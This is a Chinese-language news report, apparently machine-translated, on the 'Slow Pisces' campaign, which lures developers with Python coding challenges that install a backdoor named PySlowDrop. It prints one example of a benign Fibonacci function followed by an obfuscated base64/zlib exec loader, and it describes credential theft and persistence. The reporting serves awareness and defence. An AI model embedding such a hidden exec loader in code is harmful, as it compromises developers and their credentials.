慢速双鱼黑客利用编程挑战与Python恶意软件攻击开发者

一个名为“慢双鱼座”的复杂威胁行为者组织已成为对软件开发人员的重大威胁，他们利用欺骗性的编码挑战作为初始攻击媒介来分发基于 Python 的恶意软件。

该活动专门针对通过专业社交网站、编码论坛和开发平台的开发人员，这些平台具有看似无害的编程难题，隐藏了恶意负载。

自 2025 年 1 月以来，安全研究人员观察到这些攻击的频率不断增加，受害者主要位于北美和欧洲的技术中心。

攻击者使用多阶段感染策略进行作，该策略从向开发人员发送个性化消息开始，提供参与编码竞赛或协作解决问题的练习。

这些消息包含指向 GitHub 存储库或开发平台的链接，这些平台托管似乎是合法的 Python 编码质询。

编码挑战包含链接

但是，在执行时，质询代码会秘密部署一个复杂的 Python 后门，同时显示预期的输出以避免引起怀疑。

Palo Alto Networks 的研究人员在调查了影响金融技术公司软件开发团队的多起事件后发现了该活动。

他们的分析表明，威胁行为者展示了软件开发工作流程的高级知识，并且可能以知识产权和对开发环境的访问为目标，而不是直接的经济利益。

慢双鱼座“编码挑战”活动

这些攻击的影响不仅限于单个开发人员，还可能危及整个软件供应链。

通过针对那些拥有代码存储库和构建系统特权访问权限的人，Slow Pisces 为将漏洞引入广泛分布的软件创造了机会。

受这些攻击影响的组织报告了知识产权盗窃、未经授权访问开发环境，在某些情况下还报告了后续勒索软件事件。

研究人员命名为“PySlowDrop”的恶意软件组件利用复杂的混淆技术并利用合法的 Python 库来逃避检测。

后门通过修改的启动脚本和计划任务建立持久性，同时保持与托管在受感染云基础设施上的命令和控制服务器的加密通信。

感染机制分析

当开发人员收到并接受编码质询时，感染过程就开始了，通常表现为需要优化或调试的 Python 实现难题。

当受害者运行初始质询文件时，它包含类似于以下内容的隐藏代码：-

def calculate_fibonacci(n):    # Legitimate challenge code    a, b = 0, 1    for _ in range(n):        a, b = b, a + b    return a# Hidden malicious code obfuscated in the challengeimport base64, zlibexec(zlib.decompress(base64.b64decode('eJyVksFu2zAMhu/5CuHYYUCa9JAD5mGXYcCAddi63QYMvdCyGQuVJUOi0xbD3n2U5TbNtl52Ef2T/P+fjrfBOrKuB4Mf4MNeLB3xSM5jeO+8Dfg0wO9zJA/Gj2AddXCTY4uxg/so+A6+gMNWOJb/Q1eZarUO5Nm4UL1F49xKMKbXPuaaHw7Xr85ktZJXV68uZ6ur+9nifj5bLh4Ws/ny8un+mw295tqoIjQ52mUDjzr7K5GnHXlf+UTFYE1aXqiOSBXG1LhQD6oLdQvt5mNt9Ej9Vj4tUWrDDppM2Vc8KDFGfz50TUOyP2ZJFF+4Nj4VRn+iwSYNtolwwAa6YhMz14UN7TQ0fkJn28HoEwf97EtnMV0p38DNufRaTfU8T4XN/6Yo9i9Cca4Jrz41BZQR7qRqrUuX7XbbnpdRX7Jj3HXGd67ETHYQCm1zVdebY68u1GhLnVeZ/gLU7Mc3').decode()))

经过反混淆处理的有效负载与命令和控制服务器建立加密连接，然后为完整的 PySlowDrop 恶意软件启动无文件安装过程。

后门通过修改开发人员的配置文件或系统启动文件来创建持久性，并监视特定的开发活动。它专门针对包含 API 密钥、SSH 密钥和存储库凭据的环境变量。

PySlowDrop 采用高级反分析技术，包括环境检测，该技术在虚拟机或沙盒环境中运行时终止执行。

该恶意软件还实施了一种研究人员称之为“慢烧”的延迟执行策略——只有在长时间观察受害者的发展模式后才会触发恶意活动。

安全专家建议开发人员实施严格的代码执行策略，采用隔离的开发环境，并在运行来自外部来源的代码时要谨慎，即使它看起来来自合法的编码平台或专业联系人。

原文来自: cybersecuritynews.com